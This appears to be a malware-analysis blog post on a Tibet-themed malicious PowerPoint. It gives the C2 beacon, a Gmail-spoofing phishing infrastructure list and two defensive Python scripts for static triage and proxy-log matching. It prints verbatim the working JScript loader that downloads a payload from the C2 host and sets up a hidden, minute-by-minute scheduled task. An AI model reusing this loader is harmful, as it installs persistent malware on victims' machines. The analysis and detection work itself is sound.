“Tibet was never a part of China” is a pretty accurate statement, as Tibet was administered by the Princes of Kashmir, but let’s skip the history lesson. Tibet-themed malware never seems to stop, and this interesting malicious PowerPoint is another instance of it:
Tibet-was-never-a-part-of-China.ppsx
MD5: 0f74d8a880c638a05ba959c0d5b2fec6
SHA1: af20238714bd795fbacee2ee92fc6806d3b0d77d
Once the malicious PowerPoint is opened, the decoy it shows is the actual “Tibet was never a part of China” book published by the Central Tibetan Administration.
After the malicious file is executed on the victim’s computer, a network call is made to:
IP: 27.126.188.212
Port: 8005
Once the connection is established, a GET request is performed:
GET /aqqee HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 27.126.188.212:8005
Connection: Keep-Alive
In response to that GET /aqqee request, our bad guys send the victim a Windows Script Component (.wsc) containing the following JScript. It downloads the second stage to %AppData%\syshost.exe and keeps it running through a scheduled task:
<script language='JScript'>
<![CDATA[
// Resolve the user's %AppData% folder via WScript.Shell; the payload is dropped there as syshost.exe.
function getTempPath(){
    var wshshell = new ActiveXObject('WScript.Shell');
    var TempPath = wshshell.SpecialFolders('AppData');
    TempPath += '\\';
    return TempPath;
};
var filepath = getTempPath() + 'syshost.exe';

// Fetch the payload with a synchronous MSXML GET and write the raw bytes to disk
// through ADODB.Stream (Type 1 = binary, SaveToFile option 2 = overwrite existing file).
function DownURL(strRemoteURL, strLocalURL){
    var xmlHTTP = new ActiveXObject("Microsoft.XMLHTTP");
    xmlHTTP.open("Get", strRemoteURL, false);
    xmlHTTP.send();
    var adodbStream = new ActiveXObject("ADODB.Stream");
    adodbStream.Type = 1;
    adodbStream.Open();
    adodbStream.write(xmlHTTP.responseBody);
    adodbStream.SaveToFile(strLocalURL, 2);
    adodbStream.Close();
    adodbStream = null;
    xmlHTTP = null;
};
DownURL("https://27.126.188.212/2/syshost.exe", filepath);

// Run a command through cmd.exe with a hidden window (window style 0), without waiting for it to finish.
function execShell(cmdstr){
    var oS = new ActiveXObject('WScript.Shell');
    var shellcmd = 'cmd.exe /c ' + cmdstr;
    var o = oS.Run(shellcmd, 0, false);
};
// Persistence: a scheduled task named Diagnostic_System_Host that launches the dropped payload every minute.
execShell('schtasks \/create \/sc minute \/mo 1 \/tn Diagnostic_System_Host \/tr ' + filepath);
]]>
</script>
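The loader above can be triaged without ever executing it. The following Python is an added example written for this post, not the attacker's code and not something from the original analysis: it embeds the page's JScript as constructed input, pulls out the COM objects, download URL, dropped file name, hidden-window execution and schtasks persistence with regular expressions, and turns them into a hunt-ready indicator list. The report field names and the verdict labels are this example's own.

```python
"""Static triage of the .wsc loader shown above.

Added example, not part of the original post and not the attacker's code. The
sample below is the page's own JScript embedded verbatim as input; it is only
parsed with regular expressions, never executed. The field names in the
result dict and the verdict labels are this example's own choices.
"""
import re
from urllib.parse import urlparse

# Constructed input: the JScript from the .wsc response, copied from the post.
WSC_SAMPLE = r"""<script language='JScript'> <![CDATA[ function getTempPath(){var wshshell=new ActiveXObject('WScript.Shell');var TempPath=wshshell.SpecialFolders('AppData');TempPath+='\\';return TempPath;};var filepath=getTempPath()+'syshost.exe';function DownURL(strRemoteURL, strLocalURL){var xmlHTTP = new ActiveXObject("Microsoft.XMLHTTP");xmlHTTP.open("Get",strRemoteURL,false);xmlHTTP.send();var adodbStream = new ActiveXObject("ADODB.Stream");adodbStream.Type = 1;adodbStream.Open();adodbStream.write(xmlHTTP.responseBody);adodbStream.SaveToFile(strLocalURL,2);adodbStream.Close();adodbStream = null;xmlHTTP = null;};DownURL("https://27.126.188.212/2/syshost.exe",filepath);function execShell(cmdstr){var oS = new ActiveXObject('WScript.Shell');var shellcmd = 'cmd.exe /c '+cmdstr;var o = oS.Run(shellcmd,0,false);};execShell('schtasks \/create \/sc minute \/mo 1 \/tn Diagnostic_System_Host \/tr '+filepath); ]]> </script>"""

COM_RE = re.compile(r"""new\s+ActiveXObject\(\s*['"]([^'"]+)['"]\s*\)""")
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")
EXE_RE = re.compile(r"""['"]([\w.-]+\.exe)['"]""")          # quoted .exe literals = drop names
FOLDER_RE = re.compile(r"""SpecialFolders\(\s*['"](\w+)['"]\s*\)""")
# The script writes schtasks switches as \/create, so allow an optional backslash before each '/'.
SCHTASKS_RE = re.compile(
    r"schtasks\s+\\?/create\b.*?\\?/sc\s+(\w+)\s+\\?/mo\s+(\d+)\s+\\?/tn\s+(\S+)",
    re.IGNORECASE | re.DOTALL,
)
# WScript.Shell.Run(cmd, 0, ...) : window style 0 means the cmd.exe window is hidden.
HIDDEN_RUN_RE = re.compile(r"\.Run\(\s*[^,()]+,\s*0\s*,")


def triage(script: str) -> dict:
    """Extract the loader's behaviour from the script text without running it."""
    com_objects = sorted(set(COM_RE.findall(script)))
    urls = URL_RE.findall(script)
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    dropped = sorted(set(EXE_RE.findall(script)))
    folders = sorted(set(FOLDER_RE.findall(script)))

    persistence = None
    m = SCHTASKS_RE.search(script)
    if m:
        persistence = {"schedule": m.group(1).lower(),
                       "every": int(m.group(2)),
                       "task_name": m.group(3)}

    # Download-to-disk needs both the HTTP object and the binary stream writer.
    downloads = {"Microsoft.XMLHTTP", "ADODB.Stream"} <= set(com_objects) and "SaveToFile" in script
    executes = "WScript.Shell" in com_objects and ".Run(" in script
    hidden = bool(HIDDEN_RUN_RE.search(script))

    if downloads and persistence:
        verdict = "downloader+persistence"
    elif downloads:
        verdict = "downloader"
    elif executes:
        verdict = "command-execution"
    else:
        verdict = "no-loader-behaviour"

    return {"com_objects": com_objects, "urls": urls, "hosts": hosts,
            "dropped": dropped, "drop_folders": folders, "persistence": persistence,
            "hidden_window": hidden, "verdict": verdict}


def iocs(report: dict) -> list:
    """Flatten a triage report into strings you can hand to a hunt (URL, host, file, task)."""
    out = list(report["urls"]) + list(report["hosts"]) + list(report["dropped"])
    if report["persistence"]:
        out.append("schtask:" + report["persistence"]["task_name"])
    return out


if __name__ == "__main__":
    rep = triage(WSC_SAMPLE)
    for key, value in rep.items():
        print(f"{key}: {value}")
    print("IOCs:", iocs(rep))
```

Because the regexes work on the raw text, the same triage runs on any other .wsc or .js dropper pulled from a browser cache; a loader that builds its URL or task name from concatenated fragments will defeat the URL and schtasks patterns, and the verdict then degrades to "downloader" or "command-execution" rather than silently passing.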
Files Dropped:
C:\Users\admin\AppData\Roaming\syshost.exe (the downloaded payload)
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IUJ0G9DA\aqqee[1].wsc (the cached .wsc response to GET /aqqee)
The C2 27.126.188.212 is not the cleanest IP in the world: dig deeper and you end up down a rabbit hole of all sorts of bad stuff. As of today the C2 hosts the following domains, which have been associated with other malware activity:
mondaynews.tk
www.peopleoffreeworld.tk
newsinfo.wikaba.com
bbcnews0.onthewifi.com
bbcnews0.sytes.net
The registered domains and dynamic DNS hostnames with media references show the actors leveraging media-themed domains for their campaigns. Another interesting domain was registered to this IP but was recently DNS-blackholed by Google:
gmailcom.tw
Domain POC: "junru hu" [email protected]
This domain and the related domains below point to an active phishing campaign spoofing Gmail to target victims in Taiwan, and potentially other victims in the region. The following domains and IPs are associated with this campaign:
ssl.m.gmailcom.tw
accounts.m.gmailcom.tw
verify.dsmtp.com
ssl.verify.dsmtp.com
cloud.verify.dsmtp.com
accounts.verify.dsmtp.com
cloudplatform.verify.dsmtp.com
mailchek.serveuser.com
ssl.mailchek.serveuser.com
accounts.mailchek.serveuser.com
massistant.3utilities.com
mailcheck.serveusers.com
ssl.mailcheck.serveusers.com
accounts.mailcheck.serveusers.com
27.126.176.239
27.126.191.170
227.126.188.212 (as listed in the original; this looks like a typo for the C2 address 27.126.188.212)
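To turn the indicators in this post into something you can run over proxy logs, here is an added Python example; it is not part of the original post and the log format (pipe-separated timestamp, client, host, port, path, user-agent) and the log lines themselves are constructed for illustration, not taken from any real proxy. It goes a little beyond the plain list: listed domains match as themselves or as a parent of the observed host, so gmailcom.tw also catches accounts.m.gmailcom.tw, while generic parents such as dsmtp.com or serveuser.com are deliberately not matched on their own. The beacon's User-Agent is a stock IE7 string and is not used as an indicator.

```python
"""Matching this post's network indicators against proxy logs.

Added example, not part of the original post. The indicator values are the
ones listed on the page; the log lines and the pipe-separated format
(timestamp|client|method|host|port|path|user-agent) are constructed for
illustration and do not correspond to any particular proxy product.
"""

# Listed domains match exactly or as a parent of the observed host, so
# gmailcom.tw also catches accounts.m.gmailcom.tw. The dynamic DNS parents
# (serveuser.com, 3utilities.com, sytes.net, ...) are not indicators by themselves.
IOC_DOMAINS = sorted({
    "mondaynews.tk", "www.peopleoffreeworld.tk", "newsinfo.wikaba.com",
    "bbcnews0.onthewifi.com", "bbcnews0.sytes.net",
    "gmailcom.tw", "verify.dsmtp.com", "mailchek.serveuser.com",
    "massistant.3utilities.com", "mailcheck.serveusers.com",
})
IOC_IPS = {"27.126.188.212", "27.126.176.239", "27.126.191.170"}
C2_HOST, C2_PORT, C2_PATH = "27.126.188.212", 8005, "/aqqee"
PAYLOAD_NAME = "syshost.exe"
# The beacon's User-Agent is a stock IE7 string, so it is deliberately not an indicator here.

# Constructed log lines: an infected host (beacon, then payload fetch), one phishing
# victim, one legitimate Gmail user, and one host touching the C2 IP on another port.
SAMPLE_LOG = """\
2013-06-10T09:14:02Z|10.1.2.3|GET|27.126.188.212|8005|/aqqee|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0)
2013-06-10T09:14:03Z|10.1.2.3|GET|27.126.188.212|443|/2/syshost.exe|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0)
2013-06-10T09:20:11Z|10.1.2.7|GET|accounts.m.gmailcom.tw|443|/ServiceLogin|Mozilla/5.0
2013-06-10T09:21:40Z|10.1.2.9|GET|mail.google.com|443|/mail/|Mozilla/5.0
2013-06-10T09:22:05Z|10.1.2.11|GET|27.126.188.212|80|/|curl/7.30.0
"""


def domain_hit(host: str):
    """Return the listed indicator that host equals or is a subdomain of, else None."""
    host = host.lower().rstrip(".")
    for d in IOC_DOMAINS:
        if host == d or host.endswith("." + d):
            return d
    return None


def parse_line(line: str) -> dict:
    """Split one constructed log line into fields; the UA is the final, unsplit field."""
    ts, client, method, host, port, path, ua = line.split("|", 6)
    return {"ts": ts, "client": client, "method": method, "host": host.lower(),
            "port": int(port), "path": path, "ua": ua}


def classify(rec: dict) -> list:
    """All indicator matches for one record, most specific ones included alongside the IP hit."""
    reasons = []
    if rec["host"] in IOC_IPS:
        reasons.append("ioc_ip:" + rec["host"])
    d = domain_hit(rec["host"])
    if d:
        reasons.append("ioc_domain:" + d)
    if rec["host"] == C2_HOST and rec["port"] == C2_PORT and rec["path"] == C2_PATH:
        reasons.append("c2_beacon")
    if rec["host"] in IOC_IPS and rec["path"].rsplit("/", 1)[-1].lower() == PAYLOAD_NAME:
        reasons.append("payload_download")
    return sorted(reasons)


def scan(log_text: str) -> dict:
    """Map each client that hit an indicator to the sorted list of reasons."""
    hits = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        for reason in classify(rec):
            hits.setdefault(rec["client"], set()).add(reason)
    return {client: sorted(reasons) for client, reasons in hits.items()}


if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG).items():
        print(client, reasons)
```

A client that shows c2_beacon together with payload_download is the full infection chain from this post; an ioc_ip hit alone (like the curl request on port 80 above) deserves a look but, given how much else is hosted on that IP, is not proof of this particular malware.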